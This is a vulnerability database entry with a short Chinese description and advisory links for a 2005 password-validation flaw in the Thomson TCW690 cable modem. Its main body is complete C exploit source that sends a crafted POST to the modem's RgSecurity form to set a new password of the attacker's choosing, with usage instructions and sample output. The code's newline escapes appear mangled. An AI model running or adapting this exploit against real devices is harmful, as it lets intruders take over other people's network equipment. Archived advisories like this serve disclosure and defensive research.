https://www.exploit-db.com/exploits/829
https://www.securityfocus.com/bid/90229
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200502-073

ThomsonTCW690cablemodem是一款线缆调制解调器。运行2.1固件和ST42.03.0a软件的ThomsonTCW690cablemodem的HTTP服务器中的RgSecurity表单，在更改密码前未对其执行正确的验证，这可让LAN上的远程攻击者通过直接POST请求获取访问权。

/*****************************************************************   
*     Thomson TCW690 POST Password Validation exploit
*   
*  Tested with hardware version 2.1 and software version ST42.03.0a 
*  Bug found by: MurDoK <murdok.lnx at gmail.com> 
*  Date: 02.19.2005
*
*	sh-3.00$ gcc mdk_tcw690.c -o tcw690
*	sh-3.00$ ./tcw690 192.168.0.1 123
*	*****************************************
*	Thomson TCW690 POST Password Validation
*	Change password exploit coded by MurDoK
*	*****************************************
*	
*	[1] Connecting...
*	[2] Sending POST request...
*	[3] Done! go to http://192.168.0.1
*	sh-3.00$
*
* fuck AUNA :/
******************************************************************/ 
 
#include <netdb.h> 
 
int i=0, x=0, fd; 
struct sockaddr_in sock; 
struct hostent *he; 

char badcode[1000] = 
"POST /goform/RgSecurity HTTP/1.1rn" 
"Connection: Keep-Alivern" 
"User-Agent: Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.4.28) KHTML/3.3.2 (like Gecko)rn" 
"Referer: http://192.168.0.1/RgSecurity.asprn" 
"Pragma: no-cachern" 
"Cache-control: no-cachern" 
"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*rn" 
"Accept-Encoding: x-gzip, x-deflate, gzip, deflatern" 
"Accept-Charset: iso-8859-15, utf-8;q=0.5, *;q=0.5rn" 
"Accept-Language: es, enrn" 
"Host: 192.168.0.1rn" 
"Content-Type: application/x-www-form-urlencodedrn" 
"Authorization: Basicrn" 
"Content-Length: 62rn" 
"rn"; 
//"Password=hack1&PasswordReEnter=hack1&RestoreFactoryNo=0x00"; 
 
 
int main(int argc, char *argv[]) { 
 
//	system("clear"); 
	printf("*****************************************n"); 
	printf(" Thomson TCW690 POST Password Validationn"); 
	printf(" Change password exploit coded by MurDoKn"); 
	printf("*****************************************nn"); 
	
	if(argc<3) { 
		printf("Usage: %s <router IP> <new_password>nn", argv[0]); 
		exit(1); 
	} 
	 
	fd = socket(AF_INET, SOCK_STREAM, 0); 
	 
	he = gethostbyname(argv[1]); 
	memset((char *) &sock, 0, sizeof(sock)); 
	 
	sock.sin_family = AF_INET; 
	sock.sin_port=htons(80); 
	sock.sin_addr.s_addr=*((unsigned long*)he->h_addr); 
	 
	printf("[1] Connecting... n"); 
	 
	if ((connect(fd, (struct sockaddr *) &sock, sizeof(sock))) < 0) { 
		printf("ERROR: Can't connect to host!n"); 
		return 0; 
	} 
 
	strcat(badcode, "Password="); 
	strcat(badcode, argv[2]); 
	strcat(badcode, "&PasswordReEnter="); 
	strcat(badcode, argv[2]); 
	strcat(badcode, "&RestoreFactoryNo=0x00"); 
	 
	printf("[2] Sending POST request...n"); 
	write(fd, badcode, strlen(badcode)); 

	printf("[3] Done! go to http://%sn", argv[1]); 
	 
	close(fd); 
	 
return 1; 
}

// milw0rm.com [2005-02-19]

Thomson Thomson Cable Modem Tcw690

来源:XF
名称:thomson-tcw690-gain-access(19387)
链接:http://xforce.iss.net/xforce/xfdb/19387
来源:SECUNIA
名称:14353
链接:http://secunia.com/advisories/14353
来源:BUGTRAQ
名称:20050219ThomsonTCW690POSTPasswordValidationVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110886937131507&w;=2